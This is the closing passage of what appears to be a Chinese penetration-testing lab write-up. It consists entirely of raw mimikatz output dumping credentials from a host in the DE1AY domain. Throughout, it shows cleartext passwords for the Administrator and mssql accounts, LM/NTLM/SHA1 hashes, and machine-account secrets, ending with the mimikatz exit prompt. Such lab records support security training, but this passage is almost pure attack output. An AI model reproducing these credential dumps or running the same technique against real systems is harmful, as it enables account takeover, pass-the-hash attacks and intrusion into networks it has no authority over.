* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
kerberos :
* Username : WEB$
* Domain : de1ay.com
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
ssp :
credman :

Authentication Id : 0 ; 619780 (00000000:00097504)
Session : Interactive from 1
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 10:16:28
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 167050 (00000000:00028c8a)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 10:15:23
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WEB$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2019/12/13 10:15:08
SID : S-1-5-20
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 7b90fe98b4ecc112e6a63567da6e0f32
* SHA1 : e778e52157e2e7b485d4a9d9cb1858a8ee3650c8
tspkg :
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
kerberos :
* Username : web$
* Domain : DE1AY.COM
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
ssp :
credman :

Authentication Id : 0 ; 57022 (00000000:0000debe)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2019/12/13 10:15:07
SID :
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 7b90fe98b4ecc112e6a63567da6e0f32
* SHA1 : e778e52157e2e7b485d4a9d9cb1858a8ee3650c8
tspkg :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 4712679 (00000000:0047e8e7)
Session : CachedInteractive from 1
User Name : Administrator
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 11:37:18
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : Administrator
* Domain : de1ay.com
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 1197903 (00000000:0012474f)
Session : CachedInteractive from 1
User Name : Administrator
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 10:17:53
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : Administrator
* Domain : de1ay.com
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 768297 (00000000:000bb929)
Session : CachedInteractive from 1
User Name : Administrator
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 10:16:42
SID : S-1-5-21-2756371121-2868759905-3853650604-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : Administrator
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : Administrator
* Domain : de1ay.com
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019/12/13 10:15:49
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :

Authentication Id : 0 ; 141665 (00000000:00022961)
Session : Service from 0
User Name : mssql
Domain : DE1AY
Logon Server : DC
Logon Time : 2019/12/13 10:15:21
SID : S-1-5-21-2756371121-2868759905-3853650604-2103
msv :
[00000003] Primary
* Username : mssql
* Domain : DE1AY
* LM : f67ce55ac831223dc187b8085fe1d9df
* NTLM : 161cff084477fe596a5db81874498a24
* SHA1 : d669f3bccf14bf77d64667ec65aae32d2d10039d
tspkg :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
wdigest :
* Username : mssql
* Domain : DE1AY
* Password : 1qaz@WSX
kerberos :
* Username : mssql
* Domain : DE1AY.COM
* Password : 1qaz@WSX
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019/12/13 10:15:08
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WEB$
Domain : DE1AY
Logon Server : (null)
Logon Time : 2019/12/13 10:15:07
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WEB$
* Domain : DE1AY
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
kerberos :
* Username : web$
* Domain : DE1AY.COM
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
ssp :
credman :

mimikatz(commandline) # exit
Bye!
-------------本文结束感谢您的阅读-------------